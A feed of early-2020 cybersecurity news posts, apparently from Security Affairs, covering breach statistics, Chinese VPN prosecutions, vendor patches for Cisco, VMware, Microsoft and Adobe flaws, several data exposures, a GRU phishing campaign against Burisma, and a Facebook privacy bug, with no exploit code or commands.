According to the 2019 Data Breach Investigations Report, 43% of all nefarious online activities impacted small businesses. Giving a look at suffered by organizations, 69% of the attacks were perpetrated by outsiders, 34% involved Internal actors, 5% of them featured multiple parties, 2% involved partners.

According to the annual study conducted by IBM examining the financial impact of data breaches on organizations, the cost of a data breach has risen 12% over the past 5 years and now costs $3.92 million on average. These rising expenses are representative of the multiyear financial impact of breaches, increased regulation and the complex process of resolving criminal attacks. Small businesses with fewer than 500 employees lose an average of $2.5 million due to security incidents.

What about data breaches?

The majority of security breaches were financially motivated, 71%, while 25% of breaches were motivated by the gain of strategic advantage (espionage).

29% of breaches involved use of stolen credentials, 32% of them were the result of phishing attacks. 25% of breaches were motivated by the gain of strategic advantage (espionage)

cybercrime statistics

What about malware?

According to the Symantec 2019 Internet Security Threat Report, The number of attack groups using destructive malware increased by +25, the number of ransomware attack increased for 12%, very concerning it +33% increase in mobile malware.

Bots and worms continue to account for the vast majority of Internet of Things (IoT) attacks, in 2018 Symantec reported a significant increase of targeted attack actors against smart objects confirming the high interest in IoT as an infection vector.

Pierluigi Paganini

(SecurityAffairs – cybercrime statistics, hacking)

The post Cybercrime Statistics in 2019 appeared first on Security Affairs.

Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity

Chinese authorities continue operations against unauthorized VPN services that are very popular in the country.

China continues to intensify the monitoring of the cyberspace applying and persecution of VPN services that could be used to bypass its censorship system known as the Great Firewall.

The Great Firewall project already blocked access to more hundreds of the world’s 1,000 top websites, including Google, Facebook, Twitter, and Dropbox.

Since early 2019, the Chinese authorities have started banning “unauthorized” VPN services, any company offering such type of service in the country must obtain an appropriate license from the government.

In December, the Chinese authorities have sentenced a man to five-and-a-half years in prison for selling a VPN service without the authorization.

According to an announcement from China’s Procuratorate Daily the man was also fined 500,000 yuan ($76,000). Prosecutors said the man was convicted of collecting “illegal revenue” of 792,638 yuan ($120,500) from his unauthorized activity.

Now media reports a new arrest made by Chinese authorities in the city of Taizhou, the police arrested a man with the pseudonym of Gao (29) that successfully operated VPN service since mid-2016. Gao has made more than 11 million Chinese yuan ($1.6 million) from renting access to VPN servers to more than 28,000 regular customers, he pleaded guilty in 2019 and is still awaiting the final sentence.

In December 2017, Chinese authorities sentenced a man from Dongguan to nine months in prison for operating a VPN service that allowed him to earn $2,000. Other criminal cases were reported by Chinese authorities in the following months, blocked services had thousands of customers in the country.

In July 2019, in compliance with the Chinese Internet monitoring law, Apple has started removing all IOS VPN apps from it App Store in China.

Pierluigi Paganini

(SecurityAffairs – Chinese authorities, privacy)

The post Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity appeared first on Security Affairs.

Expert released PoC exploits for recently disclosed Cisco DCNM flaws

A researcher has publicly released some proof-of-concept (PoC) exploits and technical details for flaws in Cisco’s Data Center Network Manager (DCNM).

Early this month, Cisco released security updates for its Cisco’s Data Center Network Manager (DCNM) product that address several critical and high-severity vulnerabilities.

All the vulnerabilities were reported to Cisco through Trend Micro’s Zero Day Initiative (ZDI) and Accenture’s iDefense service by the security researcher Steven Seeley of Source Incite and Harrison Neal from PatchAdvisor.

Cisco published six advisories for a dozen vulnerabilities, eleven of them were reported by Seeley, three of these issues have been rated as critical and seven as high severity. The issues reported by Neal have been rated as medium severity.

Some of the critical flaws addressed by Cisco in DCNM could be exploited by attackers to bypass authentication and execute arbitrary actions with admin privileges on the vulnerable devices.

“Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the advisory published by Cisco.

“For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.”

The vulnerabilities have been tracked as CVE-2019-15975, CVE-2019-15976 and CVE-2019-15977. The issues affect the REST API endpoint, the SOAP API endpoint and the web-based management interface.

Cisco also addressed two of the high-severity SQL injection flaws that could be exploited by an attacker with administrative privileges to execute arbitrary SQL commands on a vulnerable device.

Three of the high-severity weaknesses could be exploited by an attacker to conduct path traversals, and two other high-severity issues by exploited by an attacker with admin rights to inject arbitrary commands on the underlying operating system.

Seeley provided technical details for three remote code execution chains and various techniques implemented in his exploits.

In this post, I share three (3) full exploitation chains and multiple primitives that can be used to compromise different installations and setups of the Cisco DCNM product to achieve unauthenticated remote code execution as SYSTEM/root. In the third chain, I (ab)use the java.lang.InheritableThreadLocal class to perform a shallow copy to gain access to a valid session.” wrote Seeley in a blog post.

Cisco only assigned 11 CVE identifiers to the flaws reported by Seeley, who anyway has found over 100 exploitable bugs, including a hundred SQL injection issues, two command injections, four instances of hardcoded keys and credentials, four cases of XML external entity (XXE) injection, and 20 file read/write/delete issues.

Cisco has updated the advisories informing its customers of the availability of PoC exploits.

“The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory.” states Cisco.

“Cisco PSIRT is not aware of any malicious use of the vulnerabilities that are described in this advisory. “

Pierluigi Paganini

(SecurityAffairs – Ciaco DCNM, hacking)

The post Expert released PoC exploits for recently disclosed Cisco DCNM flaws appeared first on Security Affairs.

VMware addresses flaws in VMware Tools and Workspace ONE SDK

VMware has released security updates to address a local privilege escalation vulnerability in VMware Tools version 10 for Windows.

VMware has released VMware Tools 11.0.0 that addresses a local privilege escalation issue in Tools 10.x.y tracked as CVE-2020-3941. The issue, classified as a race condition flaw that could be exploited by an attacker to access the guest virtual machine to escalate privileges.

“A malicious actor on the guest VM might exploit the race condition and escalate their privileges on a Windows VM. This issue affects VMware Tools for Windows version 10.x.y as the affected functionality is not present in VMware Tools 11.” reads the advisory published by the company.

The vulnerability has been assigned an important severity rating and a CVSS score of 7.8. The company also suggests a workaround in case users cannot upgrade their version.

“However, if upgrading is not possible, exploitation of this issue can be prevented by correcting the ACLs on C:\ProgramData\VMware\VMware CAF directory in the Windows guests running VMware Tools 10.x.y versions. In order to correct ACLs for this directory, remove all write access permissions for Standard User from the directory,” reads Workaround for VMware Tools for Windows security vulnerability (CVE-2020-3941) (76654).

Recently the virtualization giant also disclosed an information disclosure issue, tracked as CVE-2020-3940, that affects Workspace ONE SDK and dependent iOS and Android mobile applications.

Vulnerable applications do not properly handle certificate verification failures if SSL pinning is enabled in the UEM Console.

“A sensitive information disclosure vulnerability in the VMware Workspace ONE SDK was privately reported to VMware.” states the security advisory.

“A malicious actor with man-in-the-middle (MITM) network positioning between an affected mobile application and Workspace ONE UEM Device Services may be able to capture sensitive data in transit if SSL Pinning is enabled.” 

The vulnerability has been assigned an important severity rating and a CVSS score of 6.8.

The list of vulnerable applications and SDKs include Workspace ONE Boxer, Content, Intelligent Hub, Notebook, People, PIV-D, Web, and the SDK plugins for Apache Cordova and Xamarin.

Pierluigi Paganini

(SecurityAffairs – VM, hacking)

The post VMware addresses flaws in VMware Tools and Workspace ONE SDK appeared first on Security Affairs.

P&N Bank data breach may have impacted 100,000 West Australians

P&N Bank discloses data breach, customer account information, balances exposed

The Australian P&N Bank is notifying its customers a data breach that has exposed personally identifiable information (PII) and sensitive account data.

P&N Bank, a division of Police & Nurses Limited and operating in Western Australia, suffered a data breach and is reporting the incident to its customers, attackers have accessed personally identifiable information (PII) and sensitive account data.

According to The West Australian website, hackers have stolen personal information from 100,000 West Australians in the cyber attack.

P&N Bank confirmed that intruders accessed names, addresses, email addresses, phone numbers, customer numbers, ages, account numbers, and account balances. The bank pointed out that passwords, Social Security numbers, Tax file numbers, driver’s license or passport details, credit card numbers, and dates of birth have not been exposed. 

P&N Bank sent a data breach notification to its customers and reported the incident to law enforcement. The incident notice impacted the customer relationship management (CRM) platform, according to the bank “certain personal information […] appears to have been accessed as a result of online criminal activity.”

The cyber attack took place around December 12, when the financial institution was performing a server upgrade. Hackers likely targeted a third party company that the Bank hired to provide hosting services.

The bank announced to have locked out the attackers and solved the flaw exploited by attackers.

“Upon becoming aware of the attack, we immediately shut down the source of the vulnerability, and have since been working closely with WAPOL, other federal authorities, our third-party IT provider involved, regulators” continues the data breach notification.

The bank hired external experts to help it in investigating the incident.

P&N Bank highlighted that there is no evidence of customer accounts or funds being compromised.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post P&N Bank data breach may have impacted 100,000 West Australians appeared first on Security Affairs.

Hacker offers for sale 49 million user records from US data broker LimeLeads

49 million user records from US data broker LimeLeads were available for sale on a hacking forum.

49 million user records from US data broker LimeLeads were available for sale on a hacking forum, the data were exposed on an Elasticsearch server.

Exposed LimeLeads data contains full name, title, user email, employer/company name, company address, city, state, ZIP, phone number, website URL, company total revenue, and the company’s estimated number of employees.

The news was first reported by ZDNet, LimeLeads offers access to its database that contains business contacts that can be used for marketing activities.

ZDNet was alerted of availability online of the records two weeks ago, a hacker that goes online with the handle Omnichorus was selling LimeLeads’ data online.

“Sources in the threat intelligence community have told ZDNet that Omnichorus is a well-known individual on underground hacking forums, having built a reputation for sharing and selling hacked or stolen data — a so-called “data trader.”” reported ZDNet.

The company failed to configure its Elasticsearch server and accidentally exposed it online allowing anyone to access its content.

The popular data leak hunter Bob Diachenko confirmed to ZDNet exposed records were stored in an internal Elasticsearch server that was accidentally exposed online and indexed by the search engine Shodan since at least July 27, 2019.

Diachenko also added that he already reported the presence of the data online to LimeLeads on September 16, and that the company secured the Elasticsearch DB in just one day. This means that the database remained exposed online for more than a month and that likely someone has accessed its content and tried to monetize from the sale of the data.

Omnichorus started selling the data since October 2019, the availability of these data online pose a risk for companies and individuals whose data were included in the database.

A threat actor could launch a spear-phishing attack against them and perform a broad range of malicious activities.

Pierluigi Paganini

(SecurityAffairs – LimeLeads, hacking)

The post Hacker offers for sale 49 million user records from US data broker LimeLeads appeared first on Security Affairs.

Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA

Microsoft has released a security update to address “a broad cryptographic vulnerability” that is impacting its Windows operating system.

Microsoft Patch Tuesday updates for January 2020 address a total of 49 vulnerabilities in various products, including a serious flaw, tracked as CVE-2020-0601, in the core cryptographic component of Windows 10, Server 2016 and 2019 editions.

The CVE-2020-0601 vulnerability is different from any other previously addressed flaws because it was reported by the NSA and this is the first time that the US intelligence agency has reported a bug to the tech giant.

The flaw, dubbed ‘NSACrypt’ and tracked as CVE-2020-0601, resides in the Crypt32.dll module that contains various ‘Certificate and Cryptographic Messaging functions’ used by the Windows Crypto API for data encryption.  

The flaw affects the way Crypt32.dll module validates Elliptic Curve Cryptography (ECC) certificates.

In a press release published by the NSA, the agency explains “the certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.”

“A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.” reads the security advisory published by Microsoft.

“An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.”

An attacker could exploit the flaw to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

An attacker could also trigger the issue to spoof digital signatures on software tricking the system into believing that it is a legitimate application.

Microsoft addressed the issue by ensuring that Windows CryptoAPI completely validates ECC certificates.

Microsoft did not release technical details of the vulnerability to avoid its public exploitation.

Microsoft confirmed that it is not aware of attacks in the wild exploiting the CVE-2020-0601 flaw.

“This month we addressed the vulnerability CVE-2020-0601 in the usermode cryptographic library, CRYPT32.DLL, that affects Windows 10 systems. This vulnerability is classed Important and we have not seen it used in active attacks.” reads a blog post published by Microsoft.

“This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk.”

The NSA has also released a security advisory that includes mitigation information.

“NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows®1 cryptographic functionality. The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.” reads the NSA’s advisory.

“The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available”.

Microsoft also addresses 48 other vulnerabilities, 8 of which are rated as critical and remaining are rated as important.

None of the issues addressed this month by Microsoft were being exploited in the wild.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0601, hacking)

The post Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA appeared first on Security Affairs.

January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager

Adobe released its January 2020 Patch Tuesday updates that address several flaws in Illustrator and Experience Manager products.

Adobe releases its first 2020 patch Tuesday software updates that address several vulnerabilities in Illustrator and Experience Manager products.

“Adobe has published security bulletins for Adobe Experience Manager (APSB20-01) and Adobe Illustrator (APSB20-03). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin.” reads the security advisory.

The security updates for Illustrator CC 2019 for Windows addresses five critical memory corruption issues (CVE-2020-3710, CVE-2020-3711, CVE-2020-3712, CVE-2020-3713, CVE-2020-3714) that can lead to arbitrary code execution in the context of the targeted user.

All the vulnerabilities were reported to Adobe by Honggang Ren of Fortinet’s FortiGuard Labs.

While the vulnerabilities have been assigned a severity rating of critical, their priority rating is 3, which means Adobe does not expect any of them to be exploited in attacks.

Adobe also releases security updates for Adobe Experience Manager (AEM) that addresses four issues rated as important and moderate (CVE-2019-16466, CVE-2019-16467, CVE-2019-16468, CVE-2019-16469).

The flaws rated important are Reflected Cross-Site Scripting cross-site scripting (XSS) or Expression Language injection and could lead to the disclosure of sensitive information. The security hole rated moderate has been described as a user interface injection issue and it can also lead to the disclosure of sensitive information.

The flaws tracked as CVE-2019-16466 and CVE-2019-16468 were reported to Adobe by the security expert Lorenzo Pirondini of Netcentric.

Pierluigi Paganini

(SecurityAffairs – Adobe Patch Tuesday, hacking)

The post January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager appeared first on Security Affairs.

Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma?

Russia-linked cyber-espionage group hacked the Ukrainian energy company Burisma at the center of the impeachment trial of US President Donald Trump.

The Russian cyberspies, operating under Russia’s GRU military intelligence agency (aka Fancy Bear) carried out a spear-phishing campaign in November aimed at accessing the email of Burisma Holdings employees.

The attack was detailed by California-based cybersecurity firm Area 1 Security in a report.

“This report details an ongoing Russian government phishing campaign targeting the email credentials of employees at Burisma Holdings and its subsidiaries and partners. The campaign against the Ukranian oil & gas company was launched by the Main Intelligence Directorate of the General Staff of the Russian Army or GRU.” reads the report published by Area 1 Security. “Phishing for credentials allows cyber actors to gain control of an organization’s internal systems by utilizing trusted access methods (e.g.: valid usernames and passwords) in order to observe or to take further action. Once credentials are phished, attackers are able to operate covertly within an organization in pursuit of their goal.”

In December President Trump was facing an impeachment trial over his efforts to pressure Ukraine to investigate former Vice President Joseph R. and its relationship with the former board member Hunter Biden, the son of Joe Biden.

Russian military cyberspies were gathering information by hacking the Ukrainian gas company.

“The timing of the GRU’s campaign in relation to the 2020 US elections raises the specter that this is an early warning of what we have anticipated since the successful cyberattacks undertaken during the 2016 US elections,” continues the Area 1 report.

It is not clear which information the hackers have accessed, experts believe Russian spies were searching for potentially embarrassing material on the rival Biden and his son.

In July 2019, a phone call from Trump to Ukrainian President Volodymyr Zelensky was asking him to investigate the Bidens and Burisma.

Burisma hired the Biden’s son while his father was vice president and leading the Obama administration’s Ukraine policy.

“Donald Trump tried to coerce Ukraine into lying about Joe Biden and a major bipartisan, international anti-corruption victory because he recognized that he can’t beat the vice president,” said Andrew Bates, a spokesman for the Biden campaign.” states the NYT.

“Now we know that Vladimir Putin also sees Joe Biden as a threat,” Mr. Bates added. “Any American president who had not repeatedly encouraged foreign interventions of this kind would immediately condemn this attack on the sovereignty of our elections.”

The scheme was similar to the one allegedly adopted by Russian intelligence ahead of the Presidential election in 2016, when the cyberspies hackerd emails from Hillary Clinton’s campaign and used an army of trolls to spread propaganda and misinformation.

According to Area 1’s report, the GRU spies hacked the servers of Burisma Holdings.

In this campaign, the GRU combined several different authenticity techniques to compromise the targeted network, such as Domain-based authenticity, Business process and application authenticity, and Partner and supply chain authenticity.

“Since 2016, the GRU has consistently used an assembly line process to acquire and set up infrastructure for their phishing campaigns. Area 1 Security has correlated this campaign against Burisma Holdings with specific tactics, techniques, and procedures (TTPs) used exclusively by the GRU in phishing for credentials.” continues the report.”Repeatedly, the GRU uses Ititch, NameSilo, and NameCheap for domain registration; MivoCloud and M247 as Internet Service Providers; Yandex for MX record assignment; and a consistent pattern of lookalike domains.”

Trump is expected to stand trial in the Senate as early as this week on two articles of impeachment abuse of power and obstruction of Congress.

Pierluigi Paganini

(SecurityAffairs – Bronze President, hacking)



The post Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma? appeared first on Security Affairs.

Facebook quickly fixed a bug exploited in attacks that exposed Page Admins info

Facebook addressed last week a security flaw that exposed page admin accounts, the bug was exploited against several high-profile pages.

Last week Facebook has addressed a security issue that exposed page admin accounts, the bug was exploited in attacks in the wild against several high-profile pages.

The page admin accounts are anonymous unless the Page owner opts to make the admins public, but a bug allowed anyone to reveal the accounts running a Page.

“The accounts behind those pages are anonymous unless a Page owner opts to make the admins public. You can’t see, for example, the names of the people who post to Facebook on WIRED’s behalf. But a bug that was live from Thursday evening until Friday morning allowed anyone to easily reveal the accounts running a Page, essentially doxing anyone who posted to one.” reads a post published by Wired.

The “View edit history” in Facebook allows Page admins to view any activity related to pages, including the name of users that made changes to a post. The bug allowed miscreants to reveal the account of the individual who made the changes, including page admins, with serious privacy implications.

Wired confirmed that on message boards like 4chan, people started posting screenshots that doxed the accounts behind prominent pages. The exploitation of the bug was simple, by opening a target page and checking the edit history of a post, it was possible to view the account or accounts that made edits to each post.

Facebook quickly addressed the issue after it was alerted by a security researcher.

“We quickly fixed an issue where someone could see who edited or published a post on behalf of a Page when looking at its edit history,” Facebook said in a statement. “We are grateful to the security researcher who alerted us to this issue.”

The list of the pages targeted by hackers included the ones belonging to President Donald Trump, the street artist Banksy, Russian president Vladimir Putin, former US secretary of state Hillary Clinton, Canadian prime minister Justin Trudeau, the hacking collective Anonymous, climate activist Greta Thunberg, and the rapper Snoop Dogg, among others.

In February 2018, the security researcher Mohamed Baset discovered a similar vulnerability on Facebook.

Baset explained that the flaw was a “logical error” that he discovered after receiving an invitation to like a Facebook page on which he had liked a post. The researchers analyzed the source code of the email sent by the social network and discovered it included the name of the administrator of the page and other info.

Pierluigi Paganini

(SecurityAffairs – Facebook, hacking)

The post Facebook quickly fixed a bug exploited in attacks that exposed Page Admins info appeared first on Security Affairs.

Critical Firefox 0-Day Under Active Attacks – Update Your Browser Now!

Attention! Are you using Firefox as your web browsing software on your Windows, Linux, or Mac systems? If yes, you should immediately update your free and open-source Firefox web browser to the latest version available on Mozilla's website. Why the urgency? Mozilla earlier today released Firefox 72.0.1 and Firefox ESR 68.4.1 versions to patch a critical zero-day vulnerability in its browsing

Apple Opens Its Invite-Only Bug Bounty Program to All Researchers

As promised by Apple in August this year, the company today finally opened its bug bounty program to all security researchers, offering monetary rewards to anyone for reporting vulnerabilities in the iOS, macOS, watchOS, tvOS, iPadOS, and iCloud to the company. Since its launch three years ago, Apple's bug bounty program was open only for selected security researchers based on invitation and

Hackers Stole Customers’ Payment Card Details From Over 700 Wawa Stores

Have you stopped at any Wawa convenience store and used your payment card to buy gas or snacks in the last nine months? If yes, your credit and debit card details may have been stolen by cybercriminals. Wawa, the Philadelphia-based gas and convenience store chain, disclosed a data breach incident that may have exposed payment card information of thousands of customers who used their cards at

British Hacker Accused of Blackmailing healthcare Firms Extradited to U.S.

A British man suspected to be a member of 'The Dark Overlord,' an infamous international hacking group, has finally been extradited to the United States after being held for over two years in the United Kingdom. Nathan Francis Wyatt, 39, appeared in federal court in St. Louis, Missouri, on Wednesday to face charges related to his role in hacking healthcare and accounting companies in the U.S.